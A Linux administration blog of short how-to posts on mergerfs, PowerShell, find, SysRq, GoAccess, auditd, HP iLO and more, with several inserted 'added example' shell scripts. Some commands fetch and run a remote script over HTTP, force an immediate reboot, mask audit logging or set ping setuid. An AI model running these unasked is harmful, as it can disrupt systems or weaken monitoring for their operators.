mergerfs
September 6, 2019 — 18:36

Author: silver  Category: linux storage  Comments: Off

A FUSE union filesystem like unionfs, aufs and mhddfs: it merges multiple paths and mounts them as a single tree, similar to concatenating the drives.

Get it here: https://github.com/trapexit/mergerfs or from OS package repository.

Compared to (older) alternatives mergerfs seems very stable over the past months I’ve been using it. It offers multiple options on how to spread the data over the used drives.

Optionally SnapRAID can be used to add parity disk(s) to protect against disk failures (https://www.snapraid.it).

Create/mount pool

Example using 5 devices /dev/sd[b-f]

The disks are already partitioned and have a filesystem.

for i in {b..f}; do
  mkdir /mnt/sd${i}1
  mount /dev/sd${i}1 /mnt/sd${i}1 && \
  mkdir /mnt/sd${i}1/mfs
done && \
mkdir /mnt/mergerfs && \
mergerfs -o defaults,allow_other,use_ino /mnt/sd*/mfs /mnt/mergerfs

And here’s the result from ‘df’:

/dev/mapper/sdb1             3.6T  100M  3.5T  1% /mnt/sdb1
/dev/mapper/sdc1             3.6T  100M  3.5T  1% /mnt/sdc1
/dev/mapper/sdd1             3.6T  100M  3.5T  1% /mnt/sdd1
/dev/mapper/sde1             3.6T  100M  3.5T  1% /mnt/sde1
/dev/mapper/sdf1             3.6T  100M  3.5T  1% /mnt/sdf1
mergerfs                      18T  500M  8.5T  1% /mnt/mergerfs
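An added check (example code, not from the post or the mergerfs project): before the pool is mounted, for instance from a boot script, verify that every branch really sits on its own mounted disk. A branch whose disk failed to mount is just an empty directory on the root filesystem, and mergerfs would pool it (and write to the root disk) without complaint. The check compares the device number of each branch with the device number of `/`; the branch paths in the usage comment are the ones from the post.

```shell
#!/bin/sh
# Added example (not from the original post or the mergerfs project):
# before mounting the pool, make sure every branch really lives on its own
# mounted disk. A branch whose disk did not mount is just an empty
# directory on the root filesystem, and mergerfs would pool (and write to)
# the root disk without complaint.

# fs_dev PATH -> device number of the filesystem PATH is on (GNU/busybox stat).
fs_dev() { stat -c %d "$1"; }

# branch_ok DIR [ROOTDEV] -> exit 0 if DIR exists and is NOT on the
# filesystem identified by ROOTDEV (default: the one holding "/").
branch_ok() {
    dir=$1
    rootdev=${2:-$(fs_dev /)}
    [ -d "$dir" ] || { echo "missing: $dir" >&2; return 1; }
    if [ "$(fs_dev "$dir")" = "$rootdev" ]; then
        echo "on root filesystem, not a mounted disk: $dir" >&2
        return 1
    fi
}

# check_branches DIR... -> exit 0 only if every branch passes branch_ok.
check_branches() {
    bad=0
    for b in "$@"; do branch_ok "$b" || bad=1; done
    return $bad
}

# Usage with the post's layout (paths are the ones used above):
#   check_branches /mnt/sd[b-f]1/mfs \
#     && mergerfs -o defaults,allow_other,use_ino /mnt/sd*/mfs /mnt/mergerfs
```

Run the check in place of the bare `mergerfs` call; `check_branches` prints each failing branch on stderr and returns non-zero, so `&&` keeps the pool from being created with a missing disk.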

Changing pool

remove old drive from mergerfs pool

xattr -w user.mergerfs.srcmounts -/mnt/data1 /mnt/pool/.mergerfs

add new drive

xattr -w user.mergerfs.srcmounts +/mnt/data4 /mnt/pool/.mergerfs

some other mount options (-o)

  • use_ino make mergerfs supply inodes
  • fsname=example-name name in df
  • no_splice_write fixes page errors in syslog

https://github.com/trapexit/mergerfs#mount-options

Pool info

xattr -l /mnt/mergerfs/.mergerfs
# or:
mergerfs.ctl -m /mnt/mergerfs list values

mergerfs.ctl -m /mnt/mergerfs info

PowerShell
July 9, 2019 — 9:17

Author: silver  Category: dev linux windows  Comments: Off

I’ve been using PS for a while now and I don’t hate it anymore :) In fact I think it’s very usable for lots of tasks and automation.

Some Useful commands:

  • Get-Command *help* or Get-Command -Module PackageManagement
  • Get-Member to view properties e.g. Get-Disk | Get-Member
  • Get-Alias
  • Get-ExecutionPolicy -List
  • Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
  • piping to select, sort and where
  • Invoke-WebRequest $url

CSV, XML and JSON support is included:

  • Import-CSV Export-CSV
  • ConvertTo-XML
  • ConvertFrom-Json ConvertTo-Json

And stuff like:

  • Logging sessions: Start-Transcript Stop-Transcript
  • Viewing Certificates: cd Cert:\ (now you can ‘dir’ etc)
  • Run as admin: powershell.exe -Command "Start-Process cmd -Verb RunAs"
  • PS Linting: https://github.com/PowerShell/PSScriptAnalyzer

Remote usage is also possible over WinRM (or OpenSSH):

  • Enter-PSSession -ComputerName <host>

Then there’s Loops, Params, Arrays and Hash Tables e.g. foreach, Param([string]$arg), @() and @{}

More info:

Cgroups and NS
May 30, 2019 — 21:18

Author: silver  Category: linux  Comments: Off

Linux Control Groups and Namespaces

Used for resource limiting and process isolation.

Docs

Utils

  • lsns
  • nsenter
  • cgroup-tools pkg (cgget, cgset, …)

Network

  • ip netns list
  • ip netns identify <pid>
  • ip netns exec <netns> ip
  • or: ip -n <netns> <cmd> (-n is short for -netns)

Processes

  • ps axwww -o cgroup
  • ps axwww -o cgroup,user,pid,%cpu,%mem,vsz,rss,tname,stat,start,time,comm
  • ps axwww -o ipcns,mntns,netns,pidns,userns,utsns,pid,comm

Filesystem

  • /proc/<pid>/ns
  • /sys/fs/cgroup

Systemd

Vim linting
May 30, 2019 — 20:50

Author: silver  Category: dev linux  Comments: Off

Linting is basically making sure source code is correct.

For Vim there’s ALE: Asynchronous Lint Engine. It supports multiple tools like cpplint for C/C++, ShellCheck for shell scripts, phan for PHP etc etc.

Download

Get it here: https://github.com/w0rp/ale

Commands

  • ALELint
  • ALEEnable
  • ALEDisable
  • ALENext
  • ALEPrevious

.vimrc

To use Ctrl+j and Ctrl+k to move between errors:

nmap <silent> <C-k> <Plug>(ale_previous_wrap)
nmap <silent> <C-j> <Plug>(ale_next_wrap)

Zonemaster
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: Off

Zonemaster is an open-source DNS validation tool.

Source: https://github.com/zonemaster/zonemaster
Hosted: https://www.zonemaster.net/domain_check

Install Perl modules

Dependencies:

cpanm File::ShareDir File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine

Test

time perl -MZonemaster::Engine -e 'print map {"$_\n"} Zonemaster::Engine->test_module("BASIC", "zonemaster.net")'

Install Perl modules (CLI)

Dependencies:

cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI

Examples

zonemaster-cli --test basic zonemaster.net
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax example.com

GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: Off

Just a few useful ‘find’ examples

Exclude:

find . -path ./foo -prune -o -name bar -print
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path './foo/*'
find . -type d ! -regex '.*/\(foo\|bar\).*'
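The `-prune -o ... -print` idiom from the first exclude command, run against a constructed directory tree so the difference an explicit `-print` makes is visible (added example, not from the original post; the tree layout and the `./foo` directory name are made up for the demonstration):

```shell
#!/bin/sh
# Added example (not from the original post): the -prune / -o idiom from
# the "Exclude" commands, run against a constructed directory tree so the
# difference an explicit -print makes is visible.

# make_tree DIR: constructed sample tree; everything under ./foo must be skipped.
make_tree() {
    mkdir -p "$1/foo/sub" "$1/baz/bar" "$1/bar"
    : > "$1/foo/bar"        # must not appear: inside the pruned dir
    : > "$1/foo/sub/bar"
    : > "$1/baz/bar/x"
}

# find_bar_outside_foo DIR: names matching "bar", skipping the ./foo subtree.
# The explicit -print is what stops find from also printing the pruned
# directory itself: without it the default -print applies to the whole
# expression, so "./foo" (for which -prune returned true) is printed too.
find_bar_outside_foo() {
    ( cd "$1" && find . -path ./foo -prune -o -name bar -print )
}

# find_bar_no_print DIR: the same command without -print, for comparison.
find_bar_no_print() {
    ( cd "$1" && find . -path ./foo -prune -o -name bar )
}

# count_lines: helper so the two result sets can be compared numerically.
count_lines() { wc -l | tr -d ' '; }

demo() {
    t=$(mktemp -d)
    make_tree "$t"
    echo "with -print:";    find_bar_outside_foo "$t"
    echo "without -print:"; find_bar_no_print "$t"
    rm -rf "$t"
}
demo
```

With `-print` the result is `./bar` and `./baz/bar`; without it `./foo` appears as a third line, which is the usual surprise when a prune expression is used in a pipeline that deletes or hashes what `find` returns.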

Permissions:

find . -perm -775
find . -perm /u+w,g+w
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'

Windows:

find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: Off

BITS

Tool from Intel called “BIOS Implementation Test Suite” that can do several things including handling microcode:
https://biosbits.org
https://github.com/biosbits/bits
https://github.com/mkorthof/bits

Linux

  • load/update microcode using pkg:
  • load/update intel microcode manually:
    - get latest tgz from intel: see below
    - backup/copy files: /lib/firmware/intel-ucode
    - check kernel config: grep MICROCODE /boot/config-*
    - run iucode_tool:

    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*

    - update initramfs: update-initramfs -u -k all

  • reloading microcode:
    echo 1 > /sys/devices/system/cpu/microcode/reload
    or: rmmod cpuid; modprobe cpuid

  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo

  • skip loading microcode on boot:
    add to grub cmdline: dis_ucode_ldr

Windows

Microsoft ships certain CPU microcode updates through Windows Update. For example: KB4090007, KB3064209, KB2970215.

  • show version:
    - get hwinfo64 and goto “Central Processor(s)” > “Microcode Update Revision”
    - or get “Read & Write Everything” (RWEverything) from http://rweverything.com

  • Get Microcode

    Download the latest version from Intel:
    https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File?v=t.

    Magic SysRq Key
    November 25, 2017 — 22:19

    Author: silver  Category: linux  Comments: Off

    How to use SysRq (Print Screen key)

    ( “REISUB” )

    enable:

    echo 1 > /proc/sys/kernel/sysrq
    

    permanently:

    /etc/sysctl.d/local.conf
    kernel.sysrq=1
    

    To BREAK: CTRL+PAUSE (Serial)

    ALT+SysReq+KEY
    When logged in using SSH the SysRq may be accessible by writing to /proc/sysrq-trigger
    echo s > /proc/sysrq-trigger

    useful options:

    • b: Immediately reboot the system, without unmounting or syncing filesystems
      echo b > /proc/sysrq-trigger
    • e: Send the SIGTERM signal to all processes except init (PID 1)
    • f: Call oom_kill, which kills a process to alleviate an OOM condition:
    • s: Sync all mounted filesystems:
    • t: Output a list of current tasks and their information to the console:
    • u: Remount all mounted filesystems in read-only mode
    • w: Display list of blocked (D state) tasks
    • space: Print a summary of available magic SysRq keys

    https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/Documentation/admin-guide/sysrq.rst
    https://en.wikipedia.org/wiki/Magic_SysRq_key
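`kernel.sysrq` is a bitmask, not just an on/off switch: `1` (as used above) enables every key, `0` disables all of them, and any other value enables only the listed groups, so a host can keep the sync/remount/reboot keys for "REISUB"-style recovery while the process-signalling and kernel-dump keys stay off. The decoder below is an added example (not from the original post); the bit values are the ones documented in the kernel's sysrq.rst, and `176` is used as the sample restricted value (16 + 32 + 128).

```shell
#!/bin/sh
# Added example (not from the original post): decode the kernel.sysrq
# bitmask. "1" (used above) enables every key; a value such as 176
# (16 + 32 + 128) leaves only sync, remount-ro and reboot/poweroff usable,
# so someone at the console cannot dump kernel state or signal processes
# while an admin can still do sync / remount / reboot.
# Bit values are from Documentation/admin-guide/sysrq.rst.

# sysrq_decode VALUE -> prints one enabled function group per line.
sysrq_decode() {
    v=$1
    case "$v" in
        0) echo "disabled"; return 0 ;;
        1) v=510 ;;            # "1" means every group listed below
    esac
    [ $((v & 2))   -ne 0 ] && echo "console-loglevel"
    [ $((v & 4))   -ne 0 ] && echo "keyboard (SAK, unraw)"
    [ $((v & 8))   -ne 0 ] && echo "debug-dumps (t, m, p, ...)"
    [ $((v & 16))  -ne 0 ] && echo "sync"
    [ $((v & 32))  -ne 0 ] && echo "remount-ro"
    [ $((v & 64))  -ne 0 ] && echo "signal-processes (e, i, f)"
    [ $((v & 128)) -ne 0 ] && echo "reboot-poweroff"
    [ $((v & 256)) -ne 0 ] && echo "nice-rt-tasks"
    return 0
}

# sysrq_allows VALUE GROUP -> exit 0 if the named group is enabled by VALUE.
sysrq_allows() {
    sysrq_decode "$1" | grep -q "^$2"
}

# sysrq_current: the running kernel's setting (reads /proc, no root needed).
sysrq_current() { cat /proc/sys/kernel/sysrq; }

# Demo with the two values discussed: the post's "1" and the restricted 176.
for val in 1 176; do
    echo "kernel.sysrq=$val enables:"
    sysrq_decode "$val" | sed 's/^/  /'
done
```

`sysrq_decode "$(sysrq_current)"` shows what the running kernel currently permits; the restricted value goes into `/etc/sysctl.d/local.conf` in place of `kernel.sysrq=1` from the post.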

    GoAccess
    November 25, 2017 — 18:04

    Author: silver  Category: linux web  Comments: Off

    GoAccess is a “real-time web log analyzer” which can output in CLI or HTML (like webalizer, awstats and piwik etc). It works out of the box with Apache, for lighttpd you probably need to specify the log format. Examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the Dashboard (text based gui).

    CLI

    no conf, just arguments:

    goaccess /var/log/lighttpd/access.log \
    --date-format=%d/%b/%Y \
    --time-format='%T %z' \
    --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'
    

    -or-

    change /etc/goaccess.conf:

    date-format %d/%b/%Y:%T %z
    log-format %h %v %e [%d] "%r" %s %b "%R" "%u"
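A quick way to confirm that the `--log-format` string really matches the lighttpd lines before pointing goaccess at them is to parse a few lines with the same field layout (`%h %v %e [%d:%t] "%r" %s %b "%R" "%u"`). The awk parser below is an added example, not part of the original post or of goaccess; it tallies status codes per virtual host, drops the hosts the `-e` options above exclude, and counts lines that do not fit the layout. The sample log lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): a small awk parser for the
# lighttpd line layout the goaccess --log-format above describes:
#   %h %v %e [%d:%t] "%r" %s %b "%R" "%u"
# It tallies HTTP status codes per virtual host while dropping the hosts
# that the -e options exclude. Sample lines below are constructed.

SAMPLE_LOG='203.0.113.7 www.example.com - [25/Nov/2017:18:04:01 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 www.example.com - [25/Nov/2017:18:04:02 +0100] "GET /missing HTTP/1.1" 404 312 "-" "Mozilla/5.0"
127.0.0.1 www.example.com - [25/Nov/2017:18:04:03 +0100] "GET /health HTTP/1.1" 200 2 "-" "curl/7.52"
198.51.100.9 blog.example.com - [25/Nov/2017:18:04:04 +0100] "POST /wp-login.php HTTP/1.1" 403 0 "-" "python-requests/2.18"
not a log line at all'

# status_by_vhost [EXCLUDED_HOST...] < log -> "vhost status count" lines,
# sorted; lines that do not match the layout are counted as "_unparsed".
status_by_vhost() {
    excl=""
    for h in "$@"; do excl="$excl $h "; done
    awk -v excl="$excl" '
        # fields: $1=%h $2=%v $3=%e, then [%d:%t %z], then the quoted request.
        # The request may contain spaces, so %s is taken after its closing quote.
        {
            if (match($0, /^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9][0-9][0-9] /) == 0) {
                unparsed++; next
            }
            if (index(excl, " " $1 " ") > 0) next
            rest = substr($0, index($0, "\" ") + 2)   # text after the closing quote of %r
            split(rest, f, " ")
            count[$2 " " f[1]]++
        }
        END {
            for (k in count) print k, count[k]
            if (unparsed) print "_unparsed", "-", unparsed
        }' | sort
}

# Demo: same exclusions as the post's -e arguments.
printf '%s\n' "$SAMPLE_LOG" | status_by_vhost 127.0.0.1 ::1 exclude.example.com
```

If `_unparsed` grows when the parser is run over the real access.log, the lighttpd `accesslog.format` and the goaccess format string have drifted apart and the dashboard numbers will be off.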
    

    HTML

    Output to “static” html file.

    current log:

    goaccess /var/log/lighttpd/access.log \
      --date-format=%d/%b/%Y \
      --time-format='%T %z' \
      --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
      --output=/var/www/html/goaccess.html
    

    use all logs:

    zcat -f /var/log/lighttpd/access.log*gz | goaccess \
      --date-format=%d/%b/%Y \
      --time-format='%T %z' \
      --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
      --ignore-crawlers \
      --with-output-resolver \
      -e 127.0.0.1 -e ::1 -e exclude.example.com \
      --output=/var/www/html/goaccess.html
    

    Server

    The last option is to run it as a server using WebSockets. This allows it to:

    • output realtime HTML: --real-time-html
    • run as daemon: --daemonize
    • use FIFO: --fifo-in= --fifo-out=
    • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

    live log:

    goaccess /var/log/lighttpd/access.log \
     --date-format=%d/%b/%Y \
     --time-format='%T %z' \
     --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
     --output=/var/www/html/goaccess.html \
     --real-time-html \
     --ssl-cert=/etc/ssl/certs/cert.pem \
     --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://example.com:7890
    

    Now https://example.com/goaccess.html should show a live dashboard (TCP port 7890 needs to be reachable by the client).

    perf
    August 23, 2017 — 16:45

    Author: silver  Category: linux  Comments: Off

    perf – performance analysis tools for Linux

    Start with:

    perf top
    perf bench all

    Example:

    To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

    • record 10 seconds of backtraces on all CPUs to perf.data:
      perf record -g -a sleep 10
    • analyse recording:
      perf report

    More info:
    https://www.brendangregg.com/perf.html
    https://askubuntu.com/questions/33640/kworker-what-is-it-and-why-is-it-hogging-so-much-cpu

    Debian
    August 23, 2017 — 15:37

    Author: silver  Category: linux  Comments: Off

    Remote upgrade using aptitude:

    1. echo "defscrollback 10000" >>/root/.screenrc
    2. screen
    3. /etc/sysctl.conf:
      # on kernel panic reboot after 60s
      kernel.panic = 600
      # enable magic sysrq key
      kernel.sysrq=1
    4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
      ( if needed: apt-get install debian-archive-keyring )
    5. aptitude update
    6. aptitude safe-upgrade
      ( optionally/if needed: full-upgrade, dist-upgrade )

    Change default editor:

    sudo update-alternatives --config editor

    Install build tools:

    apt-get install build-essential

    pkg install dates:

    for file_list in $(ls -rt /var/lib/dpkg/info/*.list); do \
      stat_result=$(stat --format=%y "$file_list"); \
      printf "%-50s %s\n" "$(basename "$file_list" .list)" "$stat_result"; \
    done
    

    backports:

    apt-get -t stretch-backports install <package>
    aptitude -t stretch-backports install <package>

    /etc/apt/preferences:

    Package: *
    Pin: release a=stable
    Pin-Priority: 900
    
    Package: *
    Pin: release o=Debian
    Pin-Priority: -10
    

    “testing” packages:

    install a pkg from testing:
    sudo apt-get -t testing install tmux
    show all testing pkgs:
    aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)'
    ( stable, unstable, oldstable, etc )

    apt-get install package=version

    ping
    March 4, 2017 — 16:01

    Author: silver  Category: linux  Comments: Off

    When trying to ping as non root user you might get the following error:

    ping: icmp open socket: Operation not permitted

    There are several ways to fix this:

    reinstall pkg (debian):

    $ sudo apt-get install --reinstall iputils-ping
    

    (sets cap)

    manually set cap:

    $ sudo setcap cap_net_raw+ep /bin/ping
    $ sudo setcap cap_net_raw+ep /bin/ping6
    $ sudo getcap /bin/ping
    $ sudo getcap /bin/ping6
    

    needs kernel config:
    CONFIG_EXT4_FS_SECURITY=y


    don't use SOCK_RAW (unprivileged ICMP socket; which gids may open one is set by ping_group_range below):

    socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP)

    $ cat /proc/sys/net/ipv4/ping_group_range
    $ sysctl net.ipv4.ping_group_range
    • “1 0” default, nobody except root
    • “100 100” single group
    • “0 2147483647” everyone (max gid)
    $ sysctl -w net.ipv4.ping_group_range="0 2147483647"
    


    /etc/sysctl.d/local.conf
    net.ipv4.ping_group_range=0 2147483647


    suid (least preferred: unlike setcap this gives the whole binary root, not just cap_net_raw):

    chmod u+s /bin/ping
    chmod u+s /bin/ping6
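The three `ping_group_range` values listed above ("1 0", "100 100", "0 2147483647") are the two ends of a gid range; a group can use the unprivileged ICMP socket only if its gid lies inside it, and an inverted range means nobody. The helper below is an added example (not from the original post): it interprets a range string, checks a gid against it, and reports for the current user's groups on the running host.

```shell
#!/bin/sh
# Added example (not from the original post): interpret the
# net.ipv4.ping_group_range values listed above and decide whether a given
# gid may open an unprivileged ICMP socket (SOCK_DGRAM) without cap_net_raw
# or a setuid ping.

# ping_group_allowed "LOW HIGH" GID -> exit 0 if GID is inside the range.
# "1 0" (the default) is an empty range, so only root / capable binaries ping.
ping_group_allowed() {
    set -- $1 "$2"          # split "LOW HIGH" into $1 $2; GID becomes $3
    low=$1; high=$2; gid=$3
    [ "$low" -le "$high" ] || return 1          # inverted range = nobody
    [ "$gid" -ge "$low" ] && [ "$gid" -le "$high" ]
}

# ping_range_describe "LOW HIGH" -> which of the three cases from the post it is.
ping_range_describe() {
    set -- $1
    if [ "$1" -gt "$2" ]; then echo "nobody (except root / cap_net_raw)"
    elif [ "$1" -eq "$2" ]; then echo "single group gid $1"
    elif [ "$1" -eq 0 ] && [ "$2" -eq 2147483647 ]; then echo "everyone"
    else echo "gids $1..$2"
    fi
}

# check_this_host: reads the live sysctl and reports for the current user's
# groups (works unprivileged; only the kernel's /proc view is needed).
check_this_host() {
    range=$(cat /proc/sys/net/ipv4/ping_group_range 2>/dev/null) \
        || { echo "no ping_group_range on this host (not Linux?)"; return 0; }
    echo "ping_group_range=\"$range\" -> $(ping_range_describe "$range")"
    for g in $(id -G); do
        if ping_group_allowed "$range" "$g"; then
            echo "gid $g: may ping via SOCK_DGRAM"
        fi
    done
}
check_this_host
```

The sysctl file separates the two numbers with a tab, which is why the helpers split on whitespace rather than on a single space.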
    
    Linux Audit
    March 4, 2017 — 15:43

    Author: silver  Category: linux  Comments: Off

    First make sure “auditd” is started

    add rules:

    auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
    auditctl -w /etc/passwd -p rwa -k config2
    

    del rules:

    auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
    auditctl -W /etc/passwd -p rwa -k config2
    

    (or restart auditd)

    make permanent:

    add rules to /etc/audit/rules.d/audit.rules

    show results:

    ausearch -ts today -k config1
    aureport -k
    

    disable audit logs:

    systemctl mask systemd-journald-audit.socket
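Once rules with `-k config1` / `-k config2` are in place, the raw records in `/var/log/audit/audit.log` carry that key, and the first thing a reviewer wants is a count per key, user and outcome rather than the full records. The summariser below is an added example (not from the original post); it reads audit records from stdin and restricts to one key the way `ausearch -k` does. The records are constructed in the audit.log layout, not taken from a real system.

```shell
#!/bin/sh
# Added example (not from the original post): summarise raw audit records by
# the "key" the rules above attach (-k config1 / -k config2), so a reviewer
# can see which rule fired, for which login uid, and with which result.
# The records below are constructed in /var/log/audit/audit.log layout.

SAMPLE_AUDIT='type=SYSCALL msg=audit(1488638580.101:201): arch=c000003e syscall=257 success=yes exit=3 ppid=1 pid=1200 auid=1000 uid=0 gid=0 comm="vi" exe="/usr/bin/vim.basic" key="config2"
type=PATH msg=audit(1488638580.101:201): item=0 name="/etc/passwd" inode=1234 mode=0100644 nametype=NORMAL
type=SYSCALL msg=audit(1488638590.222:202): arch=c000003e syscall=2 success=no exit=-13 ppid=1 pid=1300 auid=1001 uid=1001 gid=1001 comm="cat" exe="/bin/cat" key="config1"
type=SYSCALL msg=audit(1488638600.333:203): arch=c000003e syscall=257 success=yes exit=4 ppid=1 pid=1301 auid=1001 uid=1001 gid=1001 comm="cat" exe="/bin/cat" key="config2"
type=SYSCALL msg=audit(1488638610.444:204): arch=c000003e syscall=257 success=yes exit=5 ppid=1 pid=1302 auid=1001 uid=1001 gid=1001 comm="cat" exe="/bin/cat" key="config2"'

# audit_field RECORD NAME -> the value of NAME=value (surrounding quotes stripped).
audit_field() {
    printf '%s\n' "$1" | sed -n "s/.*[ (]$2=\"\{0,1\}\([^\" ]*\)\"\{0,1\}.*/\1/p"
}

# audit_summary [KEY] < records -> "key auid comm success count" lines for
# SYSCALL records, optionally restricted to one rule key (like ausearch -k).
audit_summary() {
    want=$1
    while IFS= read -r rec; do
        case "$rec" in type=SYSCALL*) ;; *) continue ;; esac
        key=$(audit_field "$rec" key)
        [ -n "$want" ] && [ "$key" != "$want" ] && continue
        printf '%s %s %s %s\n' "$key" "$(audit_field "$rec" auid)" \
            "$(audit_field "$rec" comm)" "$(audit_field "$rec" success)"
    done | sort | uniq -c | awk '{print $2, $3, $4, $5, $1}'
}

# Demo over the constructed records (on a real host: audit_summary < /var/log/audit/audit.log).
printf '%s\n' "$SAMPLE_AUDIT" | audit_summary
```

`auid` (the login uid) is the field worth grouping on: it survives `su`/`sudo`, which is why the `vi` record above is attributed to 1000 even though it ran as uid 0.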
    
    HP ProLiant
    December 9, 2016 — 21:54

    Author: silver  Category: linux other  Comments: Off

    Boot:

    • BIOS: F10
    • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
    • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
    • HP IP: F10
    • Boot Menu: F11

    Install HP software:

    Repository:

    wget http://downloads.linux.hp.com/add_repo.sh
    sh add_repo.sh spp -d redhat -r 6.7 -n
    sh add_repo.sh spp -d redhat -r 6.7
    
    sh add_repo.sh spp -d redhat -r 5.10 -n
    sh add_repo.sh spp -d redhat -r 5.10
    
    sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
    rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey1024.pub
    rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048.pub
    rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048_key1.pub
    
    for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
    yum install hpacucli
    yum install hponcfg
    

    HP Server Management Application and Agents Command Line Interface

    # hpasmcli -s "clear iml"

    HP Lights-Out Online Configuration Utility for Linux

    hponcfg -f Clear_EventLog.xml -i

    Clear_EventLog.xml:

    <RIBCL VERSION="2.0">
     <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
     <RIB_INFO MODE="write">
     <CLEAR_EVENTLOG/>
     </RIB_INFO>
     </LOGIN>
    </RIBCL>
    

    Clear_IML.xml:

    <RIBCL VERSION="2.0">
      <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
      <SERVER_INFO MODE="write">
        <CLEAR_IML/>
      </SERVER_INFO>
      </LOGIN>
    </RIBCL>
    

    Administrator_reset_pw.xml:

    <ribcl VERSION="2.0">
     <login USER_LOGIN="Administrator" PASSWORD="boguspassword">
      <user_INFO MODE="write">
       <mod_USER USER_LOGIN="Administrator">
        <password value="NewPass123"/>
       </mod_USER>
      </user_INFO>
     </login>
    </ribcl>
    
    gnome-keyring
    November 26, 2016 — 17:52

    Author: silver  Category: linux  Comments: Off

    Restart:

    gnome-keyring-daemon -r -d

    If that doesn't suffice, these extra steps might help:

    pgrep -f gnome-keyring-daemon
    rm -rf ~/.cache/keyring-*
    setsid /usr/bin/gnome-keyring-daemon > /dev/null 2>&1
    ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROL
    /usr/bin/gnome-keyring-daemon --start --components=pkcs11
    /usr/bin/gnome-keyring-daemon --start --components=gpg
    /usr/bin/gnome-keyring-daemon --start --components=ssh
    
    find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
    
    sendmail with attachment
    November 26, 2016 — 17:48

    Author: silver  Category: linux  Comments: Off

    Oneliner to send email with attachment using sendmail:

    $S Subject
    $B Body
    $A Attachment
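One way to build such a message, as an added example that is not the post's own one-liner: the function assembles a multipart/mixed MIME message on stdout, using the post's `$S`, `$B` and `$A` names for subject, body and attachment, so the result can be inspected before it is piped into `sendmail -t`. The sender and recipient addresses are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): build a MIME message with one
# attachment on stdout, so it can be inspected before it is piped into
# "sendmail -t". $S, $B and $A follow the variable names in the post;
# the recipient/sender addresses are placeholders.

# build_mime_mail SUBJECT BODY FILE [TO] [FROM] -> MIME message text on stdout.
build_mime_mail() {
    S=$1; B=$2; A=$3
    TO=${4:-recipient@example.com}; FROM=${5:-sender@example.com}
    boundary="=_part_$(date +%s)_$$"
    printf 'From: %s\nTo: %s\nSubject: %s\n' "$FROM" "$TO" "$S"
    printf 'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="%s"\n\n' "$boundary"
    # part 1: the text body
    printf '%s\nContent-Type: text/plain; charset=utf-8\n\n%s\n\n' "--$boundary" "$B"
    # part 2: the attachment, base64 encoded
    printf '%s\nContent-Type: application/octet-stream; name="%s"\n' "--$boundary" "$(basename "$A")"
    printf 'Content-Transfer-Encoding: base64\nContent-Disposition: attachment; filename="%s"\n\n' "$(basename "$A")"
    base64 "$A"
    printf '\n%s\n' "--$boundary--"
}

# send_mime_mail SUBJECT BODY FILE [TO] [FROM]: hand the message to the local MTA.
send_mime_mail() { build_mime_mail "$@" | sendmail -t; }

# Demo on a constructed attachment (nothing is sent).
tmp=$(mktemp -d)
printf 'report line 1\nreport line 2\n' > "$tmp/report.txt"
build_mime_mail "Nightly report" "See attached." "$tmp/report.txt"
rm -rf "$tmp"
```

`sendmail -t` takes the recipients from the headers, which is why From/To/Subject are emitted first; the MTA adds Date and Message-ID itself.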

    
    
    Display man pages as text
    November 26, 2016 — 15:51

    Author: silver  Category: linux  Comments: Off
    man openssl | cat
    man -P cat openssl
    groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
    
    Linux Disk Encryption
    November 26, 2016 — 13:04

    Author: silver  Category: encryption linux  Comments: Off

    Linux disk encryption using Device Mapper, the cryptsetup frontend and LUKS (Linux Unified Key Setup, the on-disk format).

    Setup:

    cryptsetup -y -v luksFormat /dev/sdb1
